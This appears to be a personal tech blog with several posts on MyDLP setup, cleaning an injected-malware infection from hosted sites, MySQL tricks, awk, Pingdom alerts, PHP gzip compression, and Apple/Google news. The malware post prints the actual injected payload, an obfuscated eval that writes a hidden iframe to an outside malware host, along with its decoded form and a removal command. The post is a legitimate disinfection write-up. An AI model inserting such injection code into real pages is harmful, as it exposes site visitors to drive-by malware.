Setting up a MyDLP server

MyDLP is a free and open source data loss prevention software that runs in multi-site configurations on network servers and endpoint computers. MyDLP is currently supported only on Ubuntu. You can download a preconfigured MyDLP Server Installation Disk Image from the MyDLP website. This is a short article on how I set up MyDLP on a brand new server system.

Install Ubuntu

I had an Ubuntu 12.04 (Precise Pangolin) image available and decided to use it for the new server. Since the server system did not have an optical drive, I had to create bootable USB media. To create the bootable USB drive from the ISO file, I used Linux Live USB Creator on a Windows PC. The procedure was simple:

  1. Select the USB Media (USB Key)
  2. Choose the source media (ISO file / CD ROM)
  3. Optionally, configure the advanced options. (I disabled the VirtualBox options, since the USB drive will be used only as installation media)
  4. Click on the lightning button to create the bootable USB drive

Plug in the USB drive to your computer. Boot into the BIOS settings and select the USB drive as the primary boot device. Save the changes and restart. If everything went fine, the system will boot into the Ubuntu installation screen.
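
If you already have a Linux machine at hand, the same bootable drive can also be written with dd (a minimal sketch; the ISO filename and /dev/sdX are placeholders, and writing to the wrong device will destroy its contents):

# Identify the USB device first (e.g. with lsblk), then write the ISO to it
# WARNING: this overwrites the target device completely
sudo dd if=ubuntu-12.04-server-amd64.iso of=/dev/sdX bs=4M
sync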

Install MyDLP

If you are not installing Ubuntu from the preconfigured MyDLP Server Installation Image, you need to install MyDLP separately. To install MyDLP, the MyDLP repository needs to be added to the apt repositories list.

First of all, install the public key for the repository
wget -q -O - | sudo apt-key add -

Once the key is successfully installed, add the MyDLP repository using
sudo add-apt-repository "deb precise main"

Update apt to reload the repositories.
sudo apt-get update

Now that the repository is configured, we are ready to install MyDLP and its dependencies.
sudo aptitude install mydlp mydlp-appliance squid3-ssl

During the installation process, you will be prompted to set the MySQL root password. MyDLP had trouble connecting to the MySQL database when I used a non-empty password, so when you are installing for the first time, it is better to leave the password blank.

If the installation completed successfully, you will be able to log in to the MyDLP web UI by visiting

The default username and password for the MyDLP web appliance are both mydlp. Replace with your server's IP address if you are installing on a remote server.

You should now have a Squid proxy server listening on port 3128 of the server. To test the new DLP server, add some test policy rules using the MyDLP web UI. Update your router firewall to block direct internet access from your workstations, and configure the workstations to use the Squid instance on your new server as their proxy. Try browsing the internet from a workstation. If your server is set up properly, you will see your requests blocked or allowed based on the rules you configured. Blocked requests are listed in the logs section of the web UI for audit purposes.
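
Before touching the router, you can confirm that Squid is answering by sending a request through it manually (192.168.1.10 below is a placeholder for your server's address):

# Fetch a page through the new proxy and inspect the response headers
curl -x 192.168.1.10:3128 -I http://example.com/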

I used iptables on my TomatoUSB router to transparently redirect all traffic through the proxy server. The main advantage of configuring the proxy at the router level is that you don't have to configure each workstation separately. You can also easily configure the router to block all internet access except through the proxy.
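
For reference, the redirect rule looked roughly like the following (a sketch rather than my exact configuration; br0 is the LAN bridge on TomatoUSB, 192.168.1.10 stands in for the proxy server, and Squid must be listening in transparent/intercept mode for redirected traffic to work):

# Send all LAN HTTP traffic to the proxy, excluding traffic from
# the proxy box itself to avoid a redirect loop
iptables -t nat -A PREROUTING -i br0 ! -s 192.168.1.10 -p tcp --dport 80 -j DNAT --to-destination 192.168.1.10:3128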

Removing uy7gdr5332rkmn malware

Recently I got a mail from my hosting provider that a few of my sites were distributing malware. I connected to my server and found that all the index files had the following script tag appended to them.

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

The decoded version of the code is
document.write('<iframe src="http://sedpoo.com/?5589921" width=1 height=1></iframe>');

Removing the code manually was impossible, since a number of sites were affected and a few of the sites had directory hierarchies several levels deep.

Once again, Unix shell commands came to my rescue. The following command will remove the script from .html, .htm and .php files. If you have other extensions like .tpl, modify the command accordingly.

find . \( -name "*.html" -o -name "*.htm" -o -name "*.php" \) -print0 | xargs -0 perl -p -i -e "s#<script>eval\(unescape\('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'\)\);</script><\!-- uy7gdr5332rkmn -->##"

Make sure you run the above command from your account's root directory (usually your FTP user's home directory), because the malware affects the default error documents too, which are sometimes located outside the document root (in Plesk the document root is ~/httpdocs and the error documents are located in ~/error_docs).
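
After the cleanup, it is worth checking that no infected files remain. Since the injected code ends with the same marker comment everywhere, a recursive grep makes a quick sanity check:

# List any files that still contain the malware marker
grep -rl "uy7gdr5332rkmn" .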

Please keep in mind that your duty doesn't end with disinfection. The above command only removes the malicious code from the pages; it will not prevent the files from getting infected again. Most of the time the malware is uploaded via compromised FTP accounts (stolen passwords / brute-forced accounts). Make sure you change your FTP password and, if possible, set up passwordless (key-based) login via SFTP.

Extract single/multiple tables from MySQL dumpfile

A year back I posted on how to extract a single table from a MySQL dump file. Today, I decided to write a shell script to automate the whole process. Now it is possible to extract a single table or a range of tables from a dump file with a single command.


The script can be invoked with or without parameters. The script usage is

./ mydumpfile.sql tablename tablename2

All parameters are optional. If the third argument is provided, the script will extract all tables from tablename to tablename2. If it is not specified, only tablename will be extracted.

If the first and/or second argument is omitted, the script goes into interactive mode, allowing you to select the file and table name. The interactive mode also lets you view a list of all the tables in the dump file. You can extract a group of tables or a single table.
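
Under the hood, the idea is the same as in the original post: in a mysqldump file, every table begins with a "-- Table structure for table" comment line, so everything between one such marker and the next belongs to a single table. A rough awk sketch of that idea (not the released script; `mytable` is a placeholder table name):

# Turn printing on at mytable's header line and off at the next table's
# header; the last table in the dump runs to the end of the file
awk '/^-- Table structure for table/ { p = ($0 ~ /`mytable`/) } p' mydumpfile.sql > mytable.sql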


It took me a few hours to write the code. So, with the hope that someone will find it useful, I am releasing the code under the MIT, BSD and GPL licenses. Feel free to contact me if you are a fan of another license :)


The script, MySQL Dump Table Extractor, can be downloaded from GitHub. The current version is 1.0.

History of User Agent string

If you are a web developer, you have definitely seen the User Agent strings of the common web browsers. I have always wondered why the UA string begins with Mozilla for browsers like Internet Explorer and Opera, which are not based on Mozilla code. I found the answer on the WebAIM blog.

History of the browser user-agent string

This is the part that I liked the most

And then Google built Chrome, and Chrome used Webkit, and it was like Safari, and wanted pages built for Safari, and so pretended to be Safari. And thus Chrome used WebKit, and pretended to be Safari, and WebKit pretended to be KHTML, and KHTML pretended to be Gecko, and all browsers pretended to be Mozilla, and Chrome called itself Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/ Safari/525.13, and the user agent string was a complete mess, and near useless, and everyone pretended to be everyone else, and confusion abounded.

View currently running MySQL queries in realtime

Today I was playing around with Apache Solr. I was really impressed by its text searching capability, especially the MoreLikeThis search handler. I wanted to configure the DataImportHandler to import data directly from my MySQL database. It was really easy to configure, and I was able to perform a full import quickly. But when I tried a delta import, I found that it was not working as expected. Even though I was calling the delta import, it was performing a full import.

You might be wondering why I am saying all this here. Well, I suspected that the problem was actually my SQL query for the delta load. But to be sure, I wanted to see the query being executed by the Solr DataImportHandler. As always, I turned to Google for assistance, and I finally reached the MySQL documentation on the General Query Log. Voila! This was exactly what I wanted. All I had to do was use the --log=[filename] parameter, and all my queries would be logged to the specified log file. Nice, isn't it?

Now I had to stop the running MySQL server and restart it with the --log switch, in addition to the other regular options. But there was a problem: I was not sure of the other required parameters. You can use the ps utility, while the MySQL server is running, to find out the current parameters.

ps -ax | grep mysql

For me the output was

/usr/local/mysql/bin/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data --user=mysql --pid-file=/usr/local/mysql/data/ --port=3306 --socket=/tmp/mysql.sock

Now shut down the MySQL server.

# On Mac
/Library/StartupItems/MySQLCOM/MySQLCOM stop

# On other Linux/Unix variants, try one of
/etc/init.d/mysqld stop
service mysql stop

Start mysqld with the --log option

/usr/local/mysql/bin/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data --user=mysql --pid-file=/usr/local/mysql/data/ --port=3306 --socket=/tmp/mysql.sock --log=/tmp/query.log

The general query log contains a lot of irrelevant information. To view the log after filtering out the unwanted details, use tail and grep as given below.

tail -f /tmp/query.log | grep -v Connect | grep -v Quit

The amount of information added to the file is quite large. If you are using this on a production server, I recommend turning off the logging once you are done.
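
As an aside, if your MySQL version is 5.1 or newer, the general query log can also be toggled at runtime (assuming you have the SUPER privilege), so neither the shutdown nor the restart above is strictly necessary:

# Enable the general query log at runtime, then disable it when done
mysql -u root -e "SET GLOBAL general_log_file = '/tmp/query.log'; SET GLOBAL general_log = 'ON';"
mysql -u root -e "SET GLOBAL general_log = 'OFF';"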

Split header and footer into separate files using awk

Recently I had to write a shell script to read a file and split it into a header and a footer, saved into different files. At first I decided to write a script to loop through the file and save the content after performing the necessary condition check, but later I decided this was not the best solution and checked whether there was a one-line command for the job. As usual, I found a simple solution to the problem with awk.

awk '{if (NR == 1)print >> "header.txt"; else print >> "body.txt";}' input.txt
Where NR is a built-in variable that contains the number of the current record / line,
input.txt is the input file,
header.txt is the output file for the header,
body.txt is the output file for the remaining content.

Awk reads the input file (input.txt) line by line and checks whether the current line is the first line. If so, the content is appended ( >> ) to header.txt; otherwise it is appended to body.txt.
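
For this particular split (first line versus everything else), head and tail offer an equivalent approach, if you prefer them over awk:

# First line goes to header.txt, lines 2 onwards go to body.txt
head -n 1 input.txt > header.txt
tail -n +2 input.txt > body.txt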

Get free SMS alerts when your website is down

Every webmaster wants their websites to have 100% uptime. But the truth is that not even Google can ensure that. So the next best thing we can hope for is to be informed whenever a website goes down, so that the necessary actions can be taken to bring it back online. Unfortunately, it is neither possible nor practical to constantly monitor your website yourself. Hence we go for uptime monitoring services like Pingdom, BasicState, etc. The best uptime monitoring services charge a premium fee. Fortunately, the services mentioned above offer cut-down versions of their premium plans for free. Most of the time the free plan is limited in check frequency, alert methods, detailed statistics, number of checks and so on. In fact, none of the free uptime monitoring services I have used provided free SMS alerts directly. They either require you to pay or to use your own SMS gateway subscription.

Everything I have mentioned so far might already be known to you. So why the misleading title? Well, I am not finished yet. Yes, you can get a free every-minute uptime check with free SMS notifications when your website is down, depending on your location and mobile service provider.

Pingdom is one of the best uptime monitoring services available. I had been a premium subscriber until last month. When my subscription period was about to end, I started looking for an alternative, since I felt I was not using my subscription fully: I was using only one check, while a premium account allowed up to 5. Most of the free services I checked were limited in check frequency (at best every 5 minutes). Finally I came across Pingdom's Twitter account and found that they were offering free accounts with one every-minute check. The account also came with 20 free SMS credits. What happens once those run out? Their alert methods also include sending direct messages to your Twitter account, and Twitter allows SMS updates for tweets from people you follow. By setting up a Direct Message alert in Pingdom and following PingdomAlert on Twitter with SMS alerts turned on, you can get unlimited free SMS alerts when your website is down.

When you depend on two services, a problem with either provider can cause delays and reduce the overall effectiveness of the setup. Even if Pingdom sends the alert within a minute, there is no guarantee that Twitter will send the SMS on time. If you have a critical application, do not rely on such an unreliable setup; go for a premium subscription. When I checked, I got SMS notifications within a minute of receiving a Direct Message. Also, SMS alerts are not that important for me, since I have my mailbox open most of the time and usually detect downtime within 5 minutes from email alerts. Your case might be different, so use at your own risk.

Enabling gzip compression if mod_deflate is not enabled

Today I saw a tweet by my friend Niyas that HostGator does not support mod_gzip. This made me wonder whether the same effect could be achieved using PHP. I contacted HostGator support and confirmed that gzip support for PHP is enabled on both shared and dedicated hosting accounts, whereas the mod_deflate Apache module is available only for dedicated hosting customers. Fortunately, we can use PHP to compress files on the fly.

Enabling gzip compression in an existing PHP file is very simple. Add the following line at the beginning of the file (it should appear before any output statement).

ob_start("ob_gzhandler");

Very simple, right? But what if we have hundreds of files to edit? Don't worry, there is a solution for that too. We can use the PHP configuration variable auto_prepend_file to automatically include the above code at the beginning of every PHP file. Copy the above code to a file named prepend.php and place it at the root of your website (~/public_html in cPanel, ~/httpdocs in Plesk).

Now we are going to automatically include this file at the beginning of all PHP files using auto_prepend_file. Depending on how PHP is configured on your server, the steps for modifying the PHP configuration variable differ.

If PHP is configured in CGI/FastCGI mode (HostGator uses this mode), we will use a php.ini file to make the change. Create a file named php.ini at the root of your website and copy the following line into it. If the file already exists, append the line at the end of the file.

auto_prepend_file = <full-path-to-document-root>/prepend.php

If PHP is loaded as an Apache module (mod_php), we will have to use .htaccess to achieve the same effect. Create a file named .htaccess at the web root and copy the following line into it. If the file exists, append at the end of the file.

php_value auto_prepend_file <full-path-to-document-root>/prepend.php

In both methods, replace <full-path-to-document-root> with the full path to your website root directory, for example /home/joyce/public_html.

Now the prepend.php file is automatically included by the PHP interpreter whenever a PHP file is requested. But this method (as of now) does not work for non-PHP files like HTML, CSS and JavaScript, which should also be compressed. This is because those files are served directly by Apache and never reach the PHP interpreter. To ensure that these files are also compressed, we have to instruct Apache to pass them to the PHP interpreter before sending them to the browser. For this, let's once again go back to .htaccess. Append the following code at the end of your .htaccess file (create one if you don't have it already).

<FilesMatch "\.(htm|html|css|js)$">
	ForceType application/x-httpd-php
</FilesMatch>

The above code instructs Apache that files ending with the .htm, .html, .css and .js extensions are also PHP files and should be passed through the PHP interpreter. The only remaining problem is that the Content-type header for all these files has now changed to text/html. To fix this, we need to check the requested filename and set the correct Content-type header based on the file extension. Open prepend.php and replace the current code with

// Start output buffering and compress the output using gzip
ob_start("ob_gzhandler");

// Set the correct content type header depending on the file extension
$arContentType = array('htm' => 'text/html', 'html' => 'text/html', 'css' => 'text/css', 'js' => 'text/javascript');
if(strpos($_SERVER['REQUEST_URI'], '.') !== FALSE){
	$ext = explode('.', $_SERVER['REQUEST_URI']);
	$ext = array_pop($ext);
	// Strip the query string, if any, from the extension
	if(($pos = strpos($ext, '?')) !== FALSE){
		$ext = substr($ext, 0, $pos);
	}
	if(isset($arContentType[$ext])){
		header("Content-type: {$arContentType[$ext]}; charset=UTF-8");
	}
}

// You can also set expiration headers in this file
That's all, folks! You have successfully enabled gzip compression on your server without using any Apache modules.
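
You can verify that the responses are actually compressed by requesting a page with an Accept-Encoding header and checking for Content-Encoding: gzip in the reply (the URL below is a placeholder; substitute one of your own pages):

# Dump the response headers; a compressed reply includes "Content-Encoding: gzip"
curl -s -D - -o /dev/null -H "Accept-Encoding: gzip" http://example.com/style.css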

This is working code, but I have tested it only with a mod_php configuration. You have to be very careful when enabling PHP processing for JS/CSS files. There may be flaws in this code; if you find any, please let me know. We can further improve this code by adding expiration and cache headers to enable client-side caching.

Apple to fight Google back?

The past year has seen Google increasingly become a rival of Apple. The competition between the two companies has been growing with Google's intrusion into fields ruled by Apple. It began with Android and expanded through Google Chrome and Chrome OS, and it led to the resignation of Google CEO Eric Schmidt from Apple's Board of Directors. Now, with the release of the new Google Phone (Nexus One), the two companies have become direct competitors.

It looks like Apple has finally decided to fight back by entering Google's arena with the acquisition of the mobile ad company Quattro. Google had recently acquired AdMob, a four-year-old ad network that had risen to be one of the most important players in the mobile ad industry; that deal is under scrutiny by U.S. regulators. There were rumors that Apple also wanted to buy AdMob but was outbid by Google.

The acquisition also puts Apple in direct competition with other companies like Microsoft and Yahoo.

Nexus One released. Not available in India

The wait has come to an end. The Google Phone, a.k.a. the Nexus One, has finally been released. The official webpage of the phone has also gone live.

Technical specifications of the phone can be found here. The device, designed by Google and built by HTC, is powered by a 1GHz Snapdragon processor with 512MB of ROM and 512MB of RAM. It includes GPS, an accelerometer, a proximity sensor, a 5-megapixel camera with LED flash and an additional microphone for noise cancellation. At 130 g in weight and 11.5mm thick, Google boasted that the handset is "no thicker than a number two pencil, and no heavier than a Swiss Army knife."

Unfortunately, the phone is not available in India. I see the following message when visiting the official webpage

Sorry, the Nexus One phone is not available in your country.

According to the sales page of the phone, the Nexus One is currently available only in the U.S. The phone is available for a contract-free price of $529 or a subsidized $179 on a two-year contract with T-Mobile. The page says that the Google phone will be available in the US from Verizon Wireless and in Europe from Vodafone in spring 2010.

The phone can be personalized with a two-line engraving on the back.